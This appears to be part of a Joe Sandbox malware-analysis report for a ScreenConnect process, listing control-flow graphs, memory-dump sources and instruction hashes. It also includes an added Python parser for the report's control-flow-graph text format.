                                                                                                                                                                      control_flow_graph 1566 7ffd9b607cf8-7ffd9b607d3c 1570 7ffd9b607d86-7ffd9b607d96 1566->1570 1571 7ffd9b607d3e-7ffd9b607d5a 1566->1571 1578 7ffd9b607d9c-7ffd9b607daa call 7ffd9b604930 1570->1578 1579 7ffd9b607d98-7ffd9b607d9a 1570->1579 1572 7ffd9b608168-7ffd9b608186 call 7ffd9b600c40 * 2 1571->1572 1573 7ffd9b607d60-7ffd9b607d7e call 7ffd9b600c40 * 2 1571->1573 1588 7ffd9b608292-7ffd9b60829d 1572->1588 1589 7ffd9b60818c-7ffd9b608193 1572->1589 1590 7ffd9b607d84-7ffd9b607d85 1573->1590 1591 7ffd9b607ffe 1573->1591 1582 7ffd9b607dad-7ffd9b607dc2 1578->1582 1579->1582 1593 7ffd9b607dc8-7ffd9b607dec call 7ffd9b604980 * 2 1582->1593 1594 7ffd9b607dc4-7ffd9b607dc6 1582->1594 1595 7ffd9b608195-7ffd9b6081a4 1589->1595 1596 7ffd9b6081a6-7ffd9b6081a8 1589->1596 1590->1570 1597 7ffd9b608004-7ffd9b60801c call 7ffd9b600c40 * 2 1591->1597 1598 7ffd9b607def-7ffd9b607e04 1593->1598 1594->1598 1595->1596 1606 7ffd9b6081aa 1595->1606 1601 7ffd9b6081af-7ffd9b6081d3 1596->1601 1617 7ffd9b608046-7ffd9b608064 call 7ffd9b600c40 * 2 1597->1617 1618 7ffd9b60801e-7ffd9b608028 1597->1618 1612 7ffd9b607e0a-7ffd9b607e2e call 7ffd9b604980 * 2 1598->1612 1613 7ffd9b607e06-7ffd9b607e08 1598->1613 1614 7ffd9b60821f-7ffd9b60822d 1601->1614 1615 7ffd9b6081d5-7ffd9b6081f2 1601->1615 1606->1601 1619 7ffd9b607e31-7ffd9b607e46 1612->1619 1613->1619 1614->1588 1625 7ffd9b60829e-7ffd9b608317 1615->1625 1626 7ffd9b6081f8-7ffd9b60821d 1615->1626 1644 7ffd9b60806a-7ffd9b608075 1617->1644 1645 7ffd9b60811b-7ffd9b608126 1617->1645 1622 7ffd9b60803c 1618->1622 1623 7ffd9b60802a-7ffd9b60803a 1618->1623 1633 7ffd9b607e4c-7ffd9b607e63 call 7ffd9b604980 1619->1633 1634 7ffd9b607e48-7ffd9b607e4a 1619->1634 1629 7ffd9b60803e-7ffd9b60803f 1622->1629 1623->1629 1650 7ffd9b608360-7ffd9b6083b6 1625->1650 1651 7ffd9b608319-7ffd9b60835d 1625->1651 1626->1614 1629->1617 1640 7ffd9b607e73-7ffd9b607e81 1633->1640 1634->1640 1652 7ffd9b607e87-7ffd9b607e95 call 7ffd9b604930 1640->1652 1653 7ffd9b607e83-7ffd9b607e85 1640->1653 1657 7ffd9b608077-7ffd9b608079 1644->1657 1658 7ffd9b60807b-7ffd9b60808a call 7ffd9b604930 1644->1658 1659 7ffd9b608128-7ffd9b60812a 1645->1659 1660 7ffd9b60812c-7ffd9b60813b call 7ffd9b604930 1645->1660 1680 7ffd9b6083b8-7ffd9b6083b9 1650->1680 1681 7ffd9b6083bc-7ffd9b6083e0 1650->1681 1703 7ffd9b60835e 1651->1703 1656 7ffd9b607e98-7ffd9b607ea1 1652->1656 1653->1656 1683 7ffd9b607ea8-7ffd9b607eaf 1656->1683 1666 7ffd9b60808d-7ffd9b6080c1 1657->1666 1658->1666 1667 7ffd9b60813e-7ffd9b608140 1659->1667 1660->1667 1666->1645 1678 7ffd9b6080c3-7ffd9b6080c8 1666->1678 1667->1588 1674 7ffd9b608146-7ffd9b608158 1667->1674 1684 7ffd9b6080cb-7ffd9b6080d1 1678->1684 1680->1681 1696 7ffd9b608412-7ffd9b60841b 1681->1696 1697 7ffd9b6083e2-7ffd9b6083f1 1681->1697 1683->1591 1686 7ffd9b607eb5-7ffd9b607ebc 1683->1686 1687 7ffd9b6080d3-7ffd9b6080db 1684->1687 1688 7ffd9b6080e4-7ffd9b6080ec 1684->1688 1686->1591 1692 7ffd9b607ec2-7ffd9b607ed9 1686->1692 1693 7ffd9b6080ed-7ffd9b6080ee 1687->1693 1695 7ffd9b6080dd-7ffd9b6080e2 1687->1695 1688->1693 1694 7ffd9b6080fe 1688->1694 1706 7ffd9b607edb-7ffd9b607eed 1692->1706 1707 7ffd9b607f0e-7ffd9b607f19 1692->1707 1698 7ffd9b6080f3-7ffd9b6080fd call 7ffd9b607a28 1693->1698 1699 7ffd9b608104-7ffd9b608119 1694->1699 1695->1698 1701 7ffd9b6083f3-7ffd9b6083f4 1697->1701 1702 7ffd9b6083f7-7ffd9b608411 1697->1702 1698->1699 1699->1645 1699->1684 1701->1702 1703->1703 1715 7ffd9b607ef3-7ffd9b607f01 call 7ffd9b604930 1706->1715 1716 7ffd9b607eef-7ffd9b607ef1 1706->1716 1712 7ffd9b607f1b-7ffd9b607f1d 1707->1712 1713 7ffd9b607f1f-7ffd9b607f2e call 7ffd9b604930 1707->1713 1719 7ffd9b607f31-7ffd9b607f33 1712->1719 1713->1719 1717 7ffd9b607f04-7ffd9b607f07 1715->1717 1716->1717 1717->1707 1722 7ffd9b607f39-7ffd9b607f50 1719->1722 1723 7ffd9b607fe8-7ffd9b607ffa 1719->1723 1722->1723 1727 7ffd9b607f56-7ffd9b607f73 1722->1727 1723->1591 1730 7ffd9b607f75-7ffd9b607f7d 1727->1730 1731 7ffd9b607f7f 1727->1731 1732 7ffd9b607f81-7ffd9b607f83 1730->1732 1731->1732 1732->1723 1734 7ffd9b607f85-7ffd9b607f8f 1732->1734 1735 7ffd9b607f91-7ffd9b607f9b call 7ffd9b604bb8 1734->1735 1736 7ffd9b607f9d-7ffd9b607fa5 1734->1736 1735->1591 1735->1736 1738 7ffd9b607fa7-7ffd9b607fb2 1736->1738 1739 7ffd9b607fd3-7ffd9b607fe6 call 7ffd9b607a18 1736->1739 1738->1597 1744 7ffd9b607fb4-7ffd9b607fcc call 7ffd9b606240 1738->1744 1739->1591 1744->1739
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4db949af4e9852429c46881ea1f1d796a16c5da230c4c9d8a6b0106c9488b8b4
                                                                                                                                                                      • Instruction ID: 84e7dae20cf786a3c60128bab64afc533b1504b660cae59d5e96059bed93ee40
                                                                                                                                                                      • Opcode Fuzzy Hash: 4db949af4e9852429c46881ea1f1d796a16c5da230c4c9d8a6b0106c9488b8b4
                                                                                                                                                                      • Instruction Fuzzy Hash: A312F521B0FA4E4FE7B9D7AA84746B977D2EF96340F160079D0ADCB1E2DD28B9058341

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3600749818.00007FFD9B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b2f0000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MitigationPolicyProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1088084561-0
                                                                                                                                                                      • Opcode ID: e1b184f2909cebf0fe57c86dcf2edca1022b5c8fc5835375e52e263642db1fc5
                                                                                                                                                                      • Instruction ID: 586095030b4efc74baf8ef07e94ab46425e6d4a16c0139995b944f3182738217
                                                                                                                                                                      • Opcode Fuzzy Hash: e1b184f2909cebf0fe57c86dcf2edca1022b5c8fc5835375e52e263642db1fc5
                                                                                                                                                                      • Instruction Fuzzy Hash: AF514B31E0DB498FDB249FA8985A9E97BE0EF55310F04017FE049C3292DF68A946CBD1

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
control_flow_graph 1079 7ffd9b600715-7ffd9b600741 1080 7ffd9b600743-7ffd9b600748 1079->1080 1081 7ffd9b600780-7ffd9b600781 1079->1081 1082 7ffd9b600782-7ffd9b6007d9 1080->1082 1083 7ffd9b60074a-7ffd9b60077f 1080->1083 1081->1082 1093 7ffd9b6007db-7ffd9b6007f1 1082->1093 1094 7ffd9b600817-7ffd9b600830 1082->1094 1083->1081 1098 7ffd9b600872-7ffd9b605786 1094->1098 1099 7ffd9b600832-7ffd9b600850 1094->1099 1105 7ffd9b605788-7ffd9b6057a9 1098->1105 1106 7ffd9b6057b1-7ffd9b6057e4 1098->1106 1110 7ffd9b600893-7ffd9b6008a1 1099->1110 1111 7ffd9b600852-7ffd9b600871 1099->1111 1105->1106 1107 7ffd9b6057ea-7ffd9b6057f9 1106->1107 1108 7ffd9b605924-7ffd9b605953 1106->1108 1119 7ffd9b605804-7ffd9b605806 1107->1119 1112 7ffd9b605955-7ffd9b60595f call 7ffd9b604bb8 1108->1112 1113 7ffd9b6059a4-7ffd9b6059b8 1108->1113 1120 7ffd9b6008a3-7ffd9b600a49 1110->1120 1121 7ffd9b60088d-7ffd9b606ad2 1110->1121 1111->1098 1112->1113 1127 7ffd9b605961-7ffd9b605973 1112->1127 1117 7ffd9b6059ba-7ffd9b6059c4 1113->1117 1118 7ffd9b6059e8-7ffd9b6059f3 1113->1118 1117->1118 1123 7ffd9b6059c6-7ffd9b6059d7 1117->1123 1119->1108 1124 7ffd9b60580c-7ffd9b6058c6 1119->1124 1180 7ffd9b600a4b-7ffd9b600a7e 1120->1180 1181 7ffd9b600a85-7ffd9b600b20 1120->1181 1123->1118 1137 7ffd9b6059d9-7ffd9b6059e1 1123->1137 1124->1108 1159 7ffd9b6058c8-7ffd9b6058d8 1124->1159 1127->1113 1132 7ffd9b605975-7ffd9b60599f call 7ffd9b604e48 1127->1132 1132->1113 1137->1118 1159->1108 1160 7ffd9b6058da-7ffd9b60591f call 7ffd9b604e38 1159->1160 1160->1108 1180->1181 1192 7ffd9b600b83-7ffd9b600baa 1181->1192 1193 7ffd9b600b22-7ffd9b600b7e call 7ffd9b6008c0 * 2 1181->1193
Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 71ef42984398d679f5883d036bdf1bc41648bfee1abbb358aa3c008755439a80
• Instruction ID: f807658c2eddf63012061737ceef08aae7052d72f150acfb175ecfb3663a711f
• Opcode Fuzzy Hash: 71ef42984398d679f5883d036bdf1bc41648bfee1abbb358aa3c008755439a80
• Instruction Fuzzy Hash: DA52E436A0E7894FEBA9DE6EC4A09A077A0FF5271471501FAC0A9CF197DA25F846C740

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 1747 7ffd9b60000a-7ffd9b60008e 1757 7ffd9b6000d8-7ffd9b6000dd 1747->1757 1758 7ffd9b600090-7ffd9b6000d7 1747->1758 1760 7ffd9b6000df-7ffd9b600100 1757->1760 1761 7ffd9b6000de 1757->1761 1758->1757 1766 7ffd9b600124-7ffd9b60013c 1760->1766 1767 7ffd9b600102-7ffd9b600121 1760->1767 1761->1760 1771 7ffd9b600160-7ffd9b60017e 1766->1771 1772 7ffd9b60013e-7ffd9b60015d 1766->1772 1767->1766 1775 7ffd9b60019a-7ffd9b6001a5 1771->1775 1776 7ffd9b600180-7ffd9b600198 1771->1776 1772->1771 1779 7ffd9b6001ab-7ffd9b6001b4 1775->1779 1780 7ffd9b60023e-7ffd9b600241 1775->1780 1776->1775 1782 7ffd9b6001b6-7ffd9b6001c3 1779->1782 1783 7ffd9b6001cd-7ffd9b6001d8 1779->1783 1784 7ffd9b600298-7ffd9b6002b6 1780->1784 1785 7ffd9b600243-7ffd9b60024d 1780->1785 1782->1783 1791 7ffd9b6001c5-7ffd9b6001cb 1782->1791 1787 7ffd9b6001da-7ffd9b6001f7 1783->1787 1788 7ffd9b600224-7ffd9b600238 1783->1788 1802 7ffd9b6002ba-7ffd9b6002c6 1784->1802 1803 7ffd9b600400-7ffd9b60041e 1784->1803 1792 7ffd9b600255-7ffd9b60026e 1785->1792 1795 7ffd9b6004e2-7ffd9b60053f 1787->1795 1796 7ffd9b6001fd-7ffd9b600222 1787->1796 1788->1780 1794 7ffd9b6004bd-7ffd9b6004df 1788->1794 1791->1783 1804 7ffd9b600270-7ffd9b600272 1792->1804 1805 7ffd9b6002df-7ffd9b6002ea 1792->1805 1794->1795 1830 7ffd9b60054b-7ffd9b600552 1795->1830 1831 7ffd9b600541-7ffd9b60054a 1795->1831 1796->1788 1808 7ffd9b6002cc-7ffd9b6002da 1802->1808 1809 7ffd9b6002c8-7ffd9b6002ca 1802->1809 1803->1794 1832 7ffd9b600424-7ffd9b60042e 1803->1832 1810 7ffd9b600274 1804->1810 1811 7ffd9b6002ee-7ffd9b6002fa 1804->1811 1812 7ffd9b6002eb-7ffd9b6002ec 1805->1812 1816 7ffd9b6002dd-7ffd9b6002de 1808->1816 1809->1816 1810->1802 1817 7ffd9b600276-7ffd9b60027a 1810->1817 1818 7ffd9b6002fc-7ffd9b6002fe 1811->1818 1819 7ffd9b600300-7ffd9b600301 1811->1819 1812->1811 1816->1805 1817->1812 1822 7ffd9b60027c-7ffd9b600281 1817->1822 1823 7ffd9b600311-7ffd9b600315 1818->1823 1820 7ffd9b600302-7ffd9b60030e 1819->1820 1820->1823 1822->1820 1828 7ffd9b600283-7ffd9b60028e 1822->1828 1825 7ffd9b600316-7ffd9b60032e 1823->1825 1841 7ffd9b600334-7ffd9b600342 1825->1841 1842 7ffd9b600330-7ffd9b600332 1825->1842 1833 7ffd9b600290-7ffd9b600295 1828->1833 1834 7ffd9b6002ff 1828->1834 1836 7ffd9b600554-7ffd9b60055d 1830->1836 1837 7ffd9b60055e-7ffd9b600569 1830->1837 1838 7ffd9b600434-7ffd9b600442 1832->1838 1839 7ffd9b600430-7ffd9b600432 1832->1839 1833->1825 1840 7ffd9b600297 1833->1840 1834->1819 1843 7ffd9b600445-7ffd9b600462 1838->1843 1839->1843 1840->1784 1845 7ffd9b600345-7ffd9b600362 1841->1845 1842->1845 1850 7ffd9b600468-7ffd9b600476 1843->1850 1851 7ffd9b600464-7ffd9b600466 1843->1851 1853 7ffd9b600368-7ffd9b600376 1845->1853 1854 7ffd9b600364-7ffd9b600366 1845->1854 1852 7ffd9b600479-7ffd9b600496 1850->1852 1851->1852 1860 7ffd9b60049c-7ffd9b6004aa 1852->1860 1861 7ffd9b600498-7ffd9b60049a 1852->1861 1856 7ffd9b600379-7ffd9b60038f 1853->1856 1854->1856 1862 7ffd9b6003a6-7ffd9b6003ad 1856->1862 1863 7ffd9b600391-7ffd9b6003a4 1856->1863 1864 7ffd9b6004ad-7ffd9b6004b6 1860->1864 1861->1864 1867 7ffd9b6003b4-7ffd9b6003c7 1862->1867 1863->1862 1868 7ffd9b6003cd-7ffd9b6003d0 1863->1868 1864->1794 1867->1868 1869 7ffd9b6003e7-7ffd9b6003fa 1868->1869 1870 7ffd9b6003d2-7ffd9b6003e5 1868->1870 1869->1803 1870->1803 1870->1869
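The `control_flow_graph` lines above are the report's text serialization of each dumped function's CFG: `<id> <start>-<end>` declares a basic block by its address range (a lone address is a one-instruction block, e.g. `1761 7ffd9b6000de`), `call <addr>` records a call made from that block (`* 2` means two call sites to the same target), and `<src>-><dst>` is an edge between block ids. The parser below is an added example, not Joe Sandbox's or ConnectWise's code; the grammar is inferred from the dumps on this page, and the sample input is a constructed subset of the first graph above (the function at 0x7ffd9b600715) with two of its `call` blocks attached by edges the page itself does not show. It rebuilds the graph and reports entry and exit blocks, blocks unreachable from the entry, and the callees with their call-site counts, which is the quick way to check whether a JIT-compiled region like this one only calls into itself or reaches out to other addresses.

```python
# Added example (not Joe Sandbox's code): parser for the control_flow_graph edge list.
# Grammar inferred from this page:  <id> <start>[-<end>] [call <addr> [* <n>]]  |  <src>-><dst>
from __future__ import annotations

import re
from collections import deque
from dataclasses import dataclass, field

_RANGE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$", re.IGNORECASE)  # block range or one address
_EDGE = re.compile(r"^(\d+)->(\d+)$")

# Constructed sample: first eight blocks of the graph for the function at 0x7ffd9b600715,
# plus two of its call blocks wired in with edges the page does not show (1094->1112, 1112->1193).
SAMPLE = (
    "control_flow_graph "
    "1079 7ffd9b600715-7ffd9b600741 1080 7ffd9b600743-7ffd9b600748 1079->1080 "
    "1081 7ffd9b600780-7ffd9b600781 1079->1081 1082 7ffd9b600782-7ffd9b6007d9 1080->1082 "
    "1083 7ffd9b60074a-7ffd9b60077f 1080->1083 1081->1082 "
    "1093 7ffd9b6007db-7ffd9b6007f1 1082->1093 1094 7ffd9b600817-7ffd9b600830 1082->1094 "
    "1083->1081 1112 7ffd9b605955-7ffd9b60595f call 7ffd9b604bb8 1094->1112 "
    "1193 7ffd9b600b22-7ffd9b600b7e call 7ffd9b6008c0 * 2 1112->1193"
)


@dataclass
class Block:
    bid: int
    start: int
    end: int
    calls: list[tuple[int, int]] = field(default_factory=list)  # (callee address, call sites)


@dataclass
class Cfg:
    blocks: dict[int, Block]
    edges: list[tuple[int, int]]

    def successors(self, bid: int) -> set[int]:
        return {d for s, d in self.edges if s == bid}

    def predecessors(self, bid: int) -> set[int]:
        return {s for s, d in self.edges if d == bid}

    def entries(self) -> list[int]:  # no predecessor: normally just the function entry
        return sorted(b for b in self.blocks if not self.predecessors(b))

    def exits(self) -> list[int]:  # no successor: return, tail call or unresolved jump
        return sorted(b for b in self.blocks if not self.successors(b))

    def reachable_from(self, bid: int) -> set[int]:
        seen, todo = set(), deque([bid])
        while todo:
            cur = todo.popleft()
            if cur not in seen:
                seen.add(cur)
                todo.extend(self.successors(cur))
        return seen

    def callees(self) -> dict[int, int]:  # callee address -> total call sites
        out: dict[int, int] = {}
        for blk in self.blocks.values():
            for addr, n in blk.calls:
                out[addr] = out.get(addr, 0) + n
        return out


def parse_cfg(text: str) -> Cfg:
    toks = text.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("missing control_flow_graph header")
    blocks: dict[int, Block] = {}
    edges: list[tuple[int, int]] = []
    i = 1
    while i < len(toks):
        edge = _EDGE.match(toks[i])
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        rng = _RANGE.match(toks[i + 1]) if i + 1 < len(toks) else None
        if not toks[i].isdigit() or rng is None:
            raise ValueError(f"unexpected token {toks[i]!r} at position {i}")
        start = int(rng.group(1), 16)
        end = int(rng.group(2), 16) if rng.group(2) else start  # single-instruction block
        blk = Block(int(toks[i]), start, end)
        i += 2
        while i + 1 < len(toks) and toks[i] == "call":
            callee, n, i = int(toks[i + 1], 16), 1, i + 2
            if i + 1 < len(toks) and toks[i] == "*":
                n, i = int(toks[i + 1]), i + 2
            blk.calls.append((callee, n))
        blocks[blk.bid] = blk
    for s, d in edges:  # reject dangling edges rather than silently dropping them
        if s not in blocks or d not in blocks:
            raise ValueError(f"edge {s}->{d} references an undeclared block")
    return Cfg(blocks, edges)
```

Run it on the full edge list of a function to get `entries()` (should be a single block, the function start), `exits()`, `set(cfg.blocks) - cfg.reachable_from(entry)` for dead or mis-linked blocks, and `callees()` to see which addresses the dump calls into. The executed/not-executed colouring of the rendered graph is not part of the text dump, so coverage cannot be recovered from it.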
Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cbff991d67b26e9acf34a15e1ba883e53861684f911232a81701862ac28243a1
• Instruction ID: 173957a6b8ae85d3852c078a33fee7bc2e3c58cacf9adc2d964bcddcc2229508
• Opcode Fuzzy Hash: cbff991d67b26e9acf34a15e1ba883e53861684f911232a81701862ac28243a1
• Instruction Fuzzy Hash: EA120571B0EA4E4FE7AAD6AE84756B53BD1EF5A700F0600BAD49DCB1A3DD18BD418340

Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 96aeb8f43a33f815c286317cf12cfe59badb2dc9be8559a3595dd9e3c406b8b4
• Instruction ID: 9abf4a5c43b42daca9e4c911c33f19598de978398ffcac2d7f0098b11b90c12a
• Opcode Fuzzy Hash: 96aeb8f43a33f815c286317cf12cfe59badb2dc9be8559a3595dd9e3c406b8b4
• Instruction Fuzzy Hash: 94F10971B0EA4E4FEBA4DE6E88686A437D2EF96340F0900B9D06CC72E7DD25BD418741

Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b26e361ac30e7cae673bbb66e7385a7ffd9d0b6e3aace5a53857881945c35cf3
• Instruction ID: f8e0e0755056bed8374059e0ee5cf3360510fda5bf599303f63139ee2c47ea42
• Opcode Fuzzy Hash: b26e361ac30e7cae673bbb66e7385a7ffd9d0b6e3aace5a53857881945c35cf3
• Instruction Fuzzy Hash: 1BC15B32B0EA4E0FEB69EE1A84A18B433D1EF66350704017ED49ECB5E2ED15B9468780

Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 72e51a8ab245699cb02c5f90f8acc2436620c5bbc1767ad5790e8b41ce2067b4
• Instruction ID: 58ed066fd725c8f4c0a671f9430db9e1f4d6b7e69c4ce1a75bdb2da64b973d42
• Opcode Fuzzy Hash: 72e51a8ab245699cb02c5f90f8acc2436620c5bbc1767ad5790e8b41ce2067b4
• Instruction Fuzzy Hash: 23D1ED35709B098FDF98EE5EC0A0AA173E1FF55714B6509A9D069CF29BCA25F843CB40

Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bbaa9f21d770547c6a3531d32f593912a4e736ffcbf55253c77da416d2e9f4e3
• Instruction ID: d2a3ceb89d4b4c2c45487e95813409026e1a850ccb7e0bc5f4c6f0f36539ab62
• Opcode Fuzzy Hash: bbaa9f21d770547c6a3531d32f593912a4e736ffcbf55253c77da416d2e9f4e3
• Instruction Fuzzy Hash: F3B19E34709B098FDBDCEE59C4A5A6173E2FF65304B6509ADD069CF29ACA25F842CB40

Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aec42af2a2e24524ec824c4bdd90b8e9aa168355e8af106ee0bad01b9142650f
• Instruction ID: 454ecbe33ae632a47642650e90219e7d5b96d433599508ad65094622d5c8cafc
• Opcode Fuzzy Hash: aec42af2a2e24524ec824c4bdd90b8e9aa168355e8af106ee0bad01b9142650f
• Instruction Fuzzy Hash: 1771CB31B1B90F4AFB75E7A780716BD62D2EF95340F524079D4AECB2E1DD2C7A428241

Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 05dfe4bb4bbca785063a73f3cc6f5ac97fdce8e7ebea56cd1405bc6c4cb19b37
• Instruction ID: 714be41de2dcb08ecb55ffc486e37c07f127c5fe7c6a285d4050a7bc33cac764
• Opcode Fuzzy Hash: 05dfe4bb4bbca785063a73f3cc6f5ac97fdce8e7ebea56cd1405bc6c4cb19b37
• Instruction Fuzzy Hash: 53619220B1990E8FEBA8EF6D8465B7973D2EF98700F1941B5E01DC72ABCD28BD418741

Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 330e35029d07f1138885abc851e4433eae0c6fdb64f5de034e3b32da17283d23
• Instruction ID: 6056538b60763b82994fa9ead36515c1b297354a7a6fe736aaeaec4beca9242e
• Opcode Fuzzy Hash: 330e35029d07f1138885abc851e4433eae0c6fdb64f5de034e3b32da17283d23
• Instruction Fuzzy Hash: 2E61343570DA498FDBECEF59C0A566177A2FF69304B2405ADC06DCF29ACA25F942C740

Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5b95482bc78bb510e64ba6f9b56d141a5279fe8b3c12b71beb83ffbb1ec470f3
• Instruction ID: 3a118733c95bcec9d37beb976d80e8797fb50f39f5f90d1b199dcb8ad3a6ac09
• Opcode Fuzzy Hash: 5b95482bc78bb510e64ba6f9b56d141a5279fe8b3c12b71beb83ffbb1ec470f3
• Instruction Fuzzy Hash: 6B51AA42B0EA4E0FE7A4BE6E18759F53BD1EF96250B5400BBD05CCB1EBDC18BD464241

Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ea28bf07badfe79da4158a0c0a18201cc4ef59d4fb5956324fc235d6cf5913f6
• Instruction ID: a5d426f35d4160426b1302f1243e462ac3c2d38bd0a8701eacfa864b355b6b42
• Opcode Fuzzy Hash: ea28bf07badfe79da4158a0c0a18201cc4ef59d4fb5956324fc235d6cf5913f6
• Instruction Fuzzy Hash: C2510872B0DA494FDF98DE6A8861AA173D1FF65310F0500A9D49DCB2A6DE25FC05CB80

Memory Dump Source
• Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                      • Opcode ID: 8e4805a494d271e1fc851ecceeb00544ef4c2d49097eecd69a5e8e34ea46530d
                                                                                                                                                                      • Instruction ID: de805f96465de539bd337c68253c05dca06805ce8c8cc05c4e3d0f32923a18b0
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e4805a494d271e1fc851ecceeb00544ef4c2d49097eecd69a5e8e34ea46530d
                                                                                                                                                                      • Instruction Fuzzy Hash: E3416A42B1DE4E0FEBA4EE6E08B59B577D2EFA5290B54007AD05CC72EBDC18BD424341
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bbb28e3317e7baa776385f23f1fd599e2704a2ef201bd1c4330253ad8dcf40fa
                                                                                                                                                                      • Instruction ID: ddae715a0dd8f8e6a3f46dae8af3141b424c5ed106ffc4711d0a94800188395b
                                                                                                                                                                      • Opcode Fuzzy Hash: bbb28e3317e7baa776385f23f1fd599e2704a2ef201bd1c4330253ad8dcf40fa
                                                                                                                                                                      • Instruction Fuzzy Hash: 34416A42B1D94E0FEBA4EE6E08755B577D1EFA5290B5400BAD45CC72DBDC18BD424342
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
